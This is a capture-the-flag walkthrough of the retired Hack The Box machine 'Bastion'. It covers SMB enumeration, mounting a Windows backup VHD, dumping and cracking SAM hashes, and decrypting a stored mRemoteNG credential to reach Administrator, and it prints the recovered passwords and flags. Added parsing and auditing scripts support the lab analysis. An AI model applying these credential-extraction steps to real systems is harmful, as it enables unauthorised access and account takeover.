Bastion
Note to fellow-HTBers: Only write-ups of retired HTB machines or challenges are allowed.
Machine Info
Bastion by L4mpje
IP: 10.10.10.134
OS: linux
Recon
Nmap
As usual, we kick off with a Nmap scan.
$ nmap -v -p- -T3 -oN nmap-tcp-allports 10.10.10.134
Nmap scan report for 10.10.10.134
Host is up (0.028s latency).
Not shown: 65522 closed ports
PORT STATE SERVICE
22/tcp open ssh
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
5985/tcp open wsman
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
49669/tcp open unknown
49670/tcp open unknown
I run Nmap with the following parameters:
-v: run verbose (show more output)
-p-: scan all ports, equals 1-65535
-T3: run at normal speed (can be omitted, since this is the default speed)
-oN nmap-tcp-allports: save output in normal format with said filename
10.10.10.134: host to scan
Note that SSH and SMB are exposed, as well as some other irrelevant services.
SMB
Let’s check out if we can find some open shares.
$ nmap --script smb-enum-shares -p 139,445 10.10.10.134
Nmap scan report for 10.10.10.134
Host is up (0.026s latency).
PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Host script results:
| smb-enum-shares:
|   account_used: guest
|   \\10.10.10.134\ADMIN$:
|     Type: STYPE_DISKTREE_HIDDEN
|     Comment: Remote Admin
|     Anonymous access:
|     Current user access:
|   \\10.10.10.134\Backups:
|     Type: STYPE_DISKTREE
|     Comment:
|     Anonymous access:
|     Current user access: READ
|   \\10.10.10.134\C$:
|     Type: STYPE_DISKTREE_HIDDEN
|     Comment: Default share
|     Anonymous access:
|     Current user access:
|   \\10.10.10.134\IPC$:
|     Type: STYPE_IPC_HIDDEN
|     Comment: Remote IPC
|     Anonymous access:
|_    Current user access: READ/WRITE
As you can see, the guest account has read access on the Backups share. This sounds like something worth investigating further.
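Reading this output by hand works for one host; across a subnet it helps to have a small parser that turns the smb-enum-shares block into a finding list. The following is an added example (my own code, not from the write-up) that parses the script output shown above and reports disk shares a guest or anonymous session can read or write. The sample input is constructed from the page's output with the `<none>` markers Nmap normally prints restored; IPC$ is deliberately skipped because READ/WRITE on the IPC pipe share is normal and not a data exposure.

```python
import re

# Constructed sample input: the smb-enum-shares block from the write-up, as Nmap prints it
# (Nmap prints "<none>" where a share grants no access; the blog rendering dropped those).
SAMPLE_NMAP_OUTPUT = r"""
Host script results:
| smb-enum-shares:
|   account_used: guest
|   \\10.10.10.134\ADMIN$:
|     Type: STYPE_DISKTREE_HIDDEN
|     Comment: Remote Admin
|     Anonymous access: <none>
|     Current user access: <none>
|   \\10.10.10.134\Backups:
|     Type: STYPE_DISKTREE
|     Comment:
|     Anonymous access: <none>
|     Current user access: READ
|   \\10.10.10.134\C$:
|     Type: STYPE_DISKTREE_HIDDEN
|     Comment: Default share
|     Anonymous access: <none>
|     Current user access: <none>
|   \\10.10.10.134\IPC$:
|     Type: STYPE_IPC_HIDDEN
|     Comment: Remote IPC
|     Anonymous access: <none>
|_    Current user access: READ/WRITE
"""

# A share header line looks like "|   \\host\share:" (UNC path, trailing colon, nothing else).
SHARE_RE = re.compile(r"^\|_?\s+(\\\\[^\\]+\\[^:]+):\s*$")
# A property line looks like "|     Type: STYPE_DISKTREE"; the key is words only.
FIELD_RE = re.compile(r"^\|_?\s+([A-Za-z_ ]+?):\s*(.*)$")

# Values of account_used that mean the session had no real credentials.
UNAUTHENTICATED_ACCOUNTS = {"guest", "<blank>", ""}


def parse_smb_enum_shares(text):
    """Return (account_used, {unc_path: {property: value}}) from smb-enum-shares output."""
    account_used = None
    shares = {}
    current = None
    for line in text.splitlines():
        m = SHARE_RE.match(line)
        if m:
            current = m.group(1)
            shares[current] = {}
            continue
        m = FIELD_RE.match(line)
        if not m:
            continue
        key, value = m.group(1).strip(), m.group(2).strip()
        if key == "account_used":
            account_used = value
        elif current is not None:
            shares[current][key] = value
    return account_used, shares


def exposed_disk_shares(account_used, shares):
    """Disk shares readable or writable without real credentials.

    Returns a list of (unc_path, access_field, access) tuples. IPC$ and other
    non-disk shares are skipped; a real user's own access is not an exposure."""
    unauthenticated = (account_used or "").lower() in UNAUTHENTICATED_ACCOUNTS
    findings = []
    for unc, props in shares.items():
        if not props.get("Type", "").startswith("STYPE_DISKTREE"):
            continue
        for field in ("Anonymous access", "Current user access"):
            access = props.get(field, "<none>")
            if not access or access == "<none>":
                continue
            if field == "Current user access" and not unauthenticated:
                continue
            findings.append((unc, field, access))
    return findings


if __name__ == "__main__":
    account, shares = parse_smb_enum_shares(SAMPLE_NMAP_OUTPUT)
    for unc, field, access in exposed_disk_shares(account, shares):
        print(f"{unc}: {access} via '{field}' (session account: {account})")
```

On the sample it reports exactly one finding, the Backups share with READ for the guest session; the hidden administrative shares and IPC$ are not flagged. Feed it the script output of a whole `nmap --script smb-enum-shares` sweep to get the same triage per host.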
$ sudo smbmap -s Backups -R -H 10.10.10.134 -u guest | tee -a smbmap
[+] Finding open SMB ports….
[+] User SMB session establishd on 10.10.10.134…
[+] IP: 10.10.10.134:445 Name: 10.10.10.134
Disk Permissions
---- -----------
Backups READ, WRITE
[!] Unable to remove test directory at \\10.10.10.134\Backups\tzRrGnGVfe, plreae remove manually
.\
dr--r--r-- 0 Fri Aug 2 11:09:06 2019 .
dr--r--r-- 0 Fri Aug 2 11:09:06 2019 ..
-r--r--r-- 260 Fri Aug 2 11:00:50 2019 nmap-test-file
-w--w--w-- 116 Tue Apr 16 13:43:19 2019 note.txt
-r--r--r-- 0 Fri Feb 22 13:43:28 2019 SDT65CB.tmp
dr--r--r-- 0 Fri Aug 2 11:09:06 2019 tzRrGnGVfe
dr--r--r-- 0 Fri Feb 22 13:44:02 2019 WindowsImageBackup
[ ... ]
.\WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\
dr--r--r-- 0 Fri Feb 22 13:45:32 2019 .
dr--r--r-- 0 Fri Feb 22 13:45:32 2019 ..
-r--r--r-- 37761024 Fri Feb 22 13:44:03 2019 9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd
-r--r--r-- 5418299392 Fri Feb 22 13:45:32 2019 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd
-r--r--r-- 1186 Fri Feb 22 13:45:32 2019 BackupSpecs.xml
[ ... ]
Opening note.txt, you’ll find another clue on how you may want to continue.
$ smbclient //10.10.10.134/Backups -U guest
smb: \> dir
smb: \> get note.txt
smb: \> exit
$ cat note.txt
Sysadmins: please don't transfer the entire backup file locally, the VPN to the subsidiary office is too slow.
So we want to have a look at the back-ups.
Analysing the back-ups
The small back-up file ‘9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd’ is a recovery image, which Windows usually creates when you create a back-up image.
The interesting image however is ‘9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd’. As the note said, downloading this file might fail. In my case I was never able to download more than 75% of the vhd using the get command in smbclient.
What worked for me is adding the share as a remote disk and using rsync to copy the image to my system (as rsync allows you to continue failed downloads) for analysis.
However, there are tools available that allow you to browse through an image without having to download the whole image to your disk.
$ sudo mkdir /mnt/vhd
$ sudo mount -t cifs -o user=guest //10.10.10.134/Backups /mnt/vhd/
$ cd /mnt/vhd/WindowsImageBackup/L4mpje-PC/Backup\ 2019-02-22\ 124351/
$ rsync --append 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd ~/Documents/Projects/HackTheBox_eu/134-Bastion/
$ sudo umount /mnt/vhd
$ cd ~/Documents/Projects/HackTheBox_eu/134-Bastion/
$ sudo vhdimount 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd /mnt/vhd/
$ cd /mnt/vhd/
$ ls
$ mmls -aB vhdi1
DOS Partition Table
Offset Sector: 0
Units are in 512-byte sectors
Slot Start End Length Size Description
002: 000:000 0000000128 0031248511 0031248384 0014G NTFS / exFAT (0x07)
$ echo 128*512 | bc
65536
$ sudo mkdir /mnt/dd
$ sudo mount -o ro,offset=65536 -t ntfs vhdi1 /mnt/dd
We can now browse through the contents of the image.
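The offset arithmetic above (start sector times sector size) is easy to get wrong on images with several partitions or non-512-byte sectors, so here is an added example (my own code, not from the write-up) that parses `mmls` output, computes the byte offset for each partition and builds the read-only mount command. The sample input is constructed from the `mmls -aB` output shown above with the column header mmls prints; the optional Size column (only present with `-B`) is handled so the parser also works on plain `mmls` output.

```python
import re

# Constructed sample input: the mmls -aB output from the write-up, with the
# column header mmls prints (the blog rendering collapsed the whitespace).
SAMPLE_MMLS = """DOS Partition Table
Offset Sector: 0
Units are in 512-byte sectors

      Slot      Start        End          Length       Size   Description
002:  000:000   0000000128   0031248511   0031248384   0014G  NTFS / exFAT (0x07)
"""

UNITS_RE = re.compile(r"Units are in (\d+)-byte sectors")
# Row: index, slot, start, end, length, optional size (only with -B), description.
ROW_RE = re.compile(
    r"^\s*(\d+):\s+(\S+)\s+(\d+)\s+(\d+)\s+(\d+)\s+(?:(\d+[KMGTP]?)\s+)?(.+?)\s*$"
)


def parse_mmls(text):
    """Return (sector_size, [partition dicts]) from mmls output."""
    sector_size = None
    partitions = []
    for line in text.splitlines():
        m = UNITS_RE.search(line)
        if m:
            sector_size = int(m.group(1))
            continue
        m = ROW_RE.match(line)
        if m:
            partitions.append({
                "index": int(m.group(1)),
                "slot": m.group(2),
                "start": int(m.group(3)),   # first sector of the partition
                "end": int(m.group(4)),
                "length": int(m.group(5)),
                "size": m.group(6),         # None when mmls was run without -B
                "description": m.group(7),
            })
    if sector_size is None:
        raise ValueError("no 'Units are in N-byte sectors' line found")
    return sector_size, partitions


def byte_offset(partition, sector_size):
    """Byte offset of the partition start: the value for mount's offset= option."""
    return partition["start"] * sector_size


def guess_fstype(partition):
    """Map the mmls description to a mount -t argument; None if unknown."""
    desc = partition["description"].upper()
    if "NTFS" in desc:
        return "ntfs"
    if "LINUX" in desc:
        return "ext4"
    return None


def mount_command(image, partition, sector_size, mountpoint):
    """Read-only mount command for one partition of a raw image (mount picks the loop device)."""
    fstype = guess_fstype(partition)
    fs_arg = f"-t {fstype} " if fstype else ""
    return (f"mount -o ro,offset={byte_offset(partition, sector_size)} "
            f"{fs_arg}{image} {mountpoint}")


if __name__ == "__main__":
    sector_size, partitions = parse_mmls(SAMPLE_MMLS)
    for part in partitions:
        print(part["description"], "->", mount_command("vhdi1", part, sector_size, "/mnt/dd"))
```

For the sample this yields `offset=65536` and an `ntfs` mount, matching the manual calculation above; on a multi-partition image it prints one mount line per allocated partition.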
Cracking hashes
I start off by looking for password hashes.
These can be extracted from the SAM (Security Account Manager) hive, together with the SYSTEM hive that holds the key needed to decrypt it; both are located in C:\Windows\System32\config.
$ cd /mnt/dd/Windows/System32/config/
$ samdump2 SYSTEM SAM > ~/Documents/Projects/HackTheBox_eu/134-Bastion/hashes.txt
$ cat ~/Documents/Projects/HackTheBox_eu/134-Bastion/hashes.txt
*disabled* Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
$ hashcat -m 1000 -a 0 --username hashes.txt <wordlist>
$ cat ~/.hashcat/hashcat.potfile
26112010952d963c8dc4217daec986d9:bureaulampje
We now have the password of the user L4mpje (“lampje” = “small lightbulb” in Dutch), which is bureaulampje (“small desk lamp” in Dutch).
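A SAM dump carries more information than the one crackable hash: the well-known empty-password hashes tell you which accounts have a blank password, and a non-empty LM field tells you LM hashes are still being stored. The following is an added example (my own code, not from the write-up) that parses `samdump2` output, triages the accounts that way and emits the `user:hash` lines hashcat expects with `--username`. The sample input is the dump shown above, embedded as constructed data.

```python
import re

# Hash values of an empty password; both are well known and useful for spotting
# blank passwords (NT) and whether LM hashes are still stored at all (LM).
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Constructed sample input: the samdump2 output from the write-up.
SAMPLE_SAMDUMP = """*disabled* Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
"""

# samdump2 prefixes disabled accounts with "*disabled*" (sometimes rendered "*disabled *").
LINE_RE = re.compile(
    r"^(?P<disabled>\*disabled\s*\*\s+)?(?P<user>[^:]+):(?P<rid>\d+):"
    r"(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::\s*$",
    re.IGNORECASE,
)


def parse_samdump(text):
    """Return one dict per account line; lines that are not pwdump-formatted are skipped."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        entries.append({
            "user": m.group("user"),
            "rid": int(m.group("rid")),
            "lm": m.group("lm").lower(),
            "nt": m.group("nt").lower(),
            "disabled": m.group("disabled") is not None,
        })
    return entries


def triage(entries):
    """Classify accounts the way an auditor reads a SAM dump."""
    return {
        "blank_password": [e["user"] for e in entries if e["nt"] == EMPTY_NT],
        "lm_hash_stored": [e["user"] for e in entries if e["lm"] != EMPTY_LM],
        "enabled_with_password": [e["user"] for e in entries
                                  if not e["disabled"] and e["nt"] != EMPTY_NT],
        "builtin_rids": [e["user"] for e in entries if e["rid"] < 1000],
    }


def hashcat_lines(entries):
    """user:NT-hash lines for `hashcat -m 1000 --username`, enabled accounts with a real password only."""
    return [f'{e["user"]}:{e["nt"]}' for e in entries
            if not e["disabled"] and e["nt"] != EMPTY_NT]


if __name__ == "__main__":
    entries = parse_samdump(SAMPLE_SAMDUMP)
    for category, users in triage(entries).items():
        print(f"{category}: {users}")
    print("\n".join(hashcat_lines(entries)))
```

On the sample, Administrator and Guest are reported as disabled accounts with a blank password, no LM hashes are stored, and only `L4mpje:26112010952d963c8dc4217daec986d9` is worth feeding to hashcat.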
Got the user flag
I use this password to SSH onto the box and find the users.txt file containing the flag on the user’s desktop.
$ ssh L4mpje@10.10.10.134 # enter password bureaulampje
L4mpje@BASTION C:\Users\L4mpje> type C:\Users\L4mpje\Desktop\users.txt
9bfe57d5c3309db3a151772f9d86c6cd
Going for the root flag
While browsing through the filesystem, I noticed mRemoteNG was installed.
This is also confirmed by running this small line of PowerShell:
L4mpje@BASTION C:\Users\L4mpje\Downloads> powershell
PS C:\Users\L4mpje\Downloads> Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table -AutoSize
DisplayName DisplayVersion Publisher InstallDate
----------- -------------- --------- -----------
mRemoteNG 1.76.11.40527 Next Generation Software 20190222
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161 Microsoft Corporation 20190416
Searching for vulnerabilities on exploit-db didn’t reveal anything, but a quick Google search did bring me to an interesting Reddit post.
The Ruby script in the post didn’t seem to work for me, but I finally found a Python script on GitHub which did.
I downloaded confCons.xml from the host and ran the script to recover the password for the Administrator account. I then logged in to the host as Administrator to retrieve the flag from the Administrator’s desktop.
$ scp -T L4mpje@10.10.10.134:"C:\Users\L4mpje\AppData\Roaming\mRemoteNG\confCons.xml" ./
$ cat confCons.xml
$ python3 mremoteng_decrypt.py -s aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==
Password: thXLHM96BeKL0ER2
$ ssh Administrator@10.10.10.134
administrator@BASTION C:\Users\Administrator> type Desktop\root.txt
958850b91811676ed6620a9c430e65c8
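What makes confCons.xml worth protecting is visible without decrypting anything: the file records the cipher parameters in its root element and stores each connection's password as a base64 blob laid out as salt, nonce, ciphertext and GCM tag, so anyone who can read the file and knows the master password (the application default unless the user set one) can recover the stored credentials. The following is an added example (my own code, not the decrypt script from the page) that inventories a confCons.xml: which connections have a stored password, which hosts they point at, and how the file is protected. The XML sample is constructed in the mRemoteNG 1.76 layout as I understand it (attribute names and the container-as-Node structure are assumptions; the Protected value is a placeholder); the password blob is the one shown above.

```python
import base64
import xml.etree.ElementTree as ET

# The Password value from the write-up's confCons.xml (as shown on the page).
PASSWORD_BLOB = ("aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAow"
                 "VRdC7emf7lWWA10dQKiw==")

# Constructed sample confCons.xml in the mRemoteNG 1.76 layout (attribute names as
# understood from the format; Protected is a placeholder, not a real blob).
SAMPLE_CONFCONS = f"""<?xml version="1.0" encoding="utf-8"?>
<mrng:Connections xmlns:mrng="http://mremoteng.org" Name="Connections" Export="false"
    EncryptionEngine="AES" BlockCipherMode="GCM" KdfIterations="1000"
    FullFileEncryption="false" Protected="PLACEHOLDER" ConfVersion="2.6">
  <Node Name="DC" Type="Connection" Username="Administrator" Domain=""
        Password="{PASSWORD_BLOB}" Hostname="127.0.0.1" Protocol="RDP" Port="3389" />
  <Node Name="Lab" Type="Container" Username="" Password="">
    <Node Name="jump" Type="Connection" Username="svc" Domain="" Password=""
          Hostname="10.0.0.5" Protocol="SSH2" Port="22" />
  </Node>
</mrng:Connections>
""".encode()

# Layout of a stored Password value once base64-decoded: salt | nonce | ciphertext | tag.
# The salt feeds the PBKDF2 derivation of the AES key from the master password; in GCM
# the ciphertext is as long as the plaintext, so its length reveals the password length.
SALT_LEN = NONCE_LEN = TAG_LEN = 16


def blob_layout(b64):
    """Split a stored Password value into its field lengths (no decryption performed)."""
    raw = base64.b64decode(b64)
    if len(raw) < SALT_LEN + NONCE_LEN + TAG_LEN:
        raise ValueError("blob too short for salt + nonce + tag")
    return {"salt": SALT_LEN, "nonce": NONCE_LEN,
            "ciphertext": len(raw) - SALT_LEN - NONCE_LEN - TAG_LEN, "tag": TAG_LEN}


def audit_confcons(xml_bytes):
    """Return the file's protection settings and one finding per connection node."""
    root = ET.fromstring(xml_bytes)
    settings = {
        "engine": root.get("EncryptionEngine"),
        "mode": root.get("BlockCipherMode"),
        "kdf_iterations": int(root.get("KdfIterations", "1000")),
        "full_file_encryption": root.get("FullFileEncryption") == "true",
    }
    findings = []

    def walk(parent, path):
        # Containers are Node elements of Type="Container" holding further Node children.
        for node in parent:
            if node.tag != "Node":
                continue
            here = path + [node.get("Name", "")]
            if node.get("Type") == "Container":
                walk(node, here)
                continue
            pw = node.get("Password", "")
            findings.append({
                "path": "/".join(here),
                "hostname": node.get("Hostname"),
                "protocol": node.get("Protocol"),
                "username": node.get("Username"),
                "password_stored": bool(pw),
                "password_length": blob_layout(pw)["ciphertext"] if pw else 0,
            })

    walk(root, [])
    return {"settings": settings, "findings": findings}


if __name__ == "__main__":
    report = audit_confcons(SAMPLE_CONFCONS)
    print("protection:", report["settings"])
    for f in report["findings"]:
        if f["password_stored"]:
            print(f'{f["path"]}: {f["username"]}@{f["hostname"]} ({f["protocol"]}), '
                  f'{f["password_length"]}-byte password stored')
```

For the blob from the page the decoded length is 64 bytes, leaving 16 bytes of ciphertext, which matches the 16-character password recovered above. The defensive reading of the report is that, with FullFileEncryption off and no custom master password, every stored credential is recoverable by anyone who can read the user's AppData; setting a master password, or not storing privileged credentials in connection files at all, is what removes the exposure.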
Whatever you are, be a good one.
~ Abraham Lincoln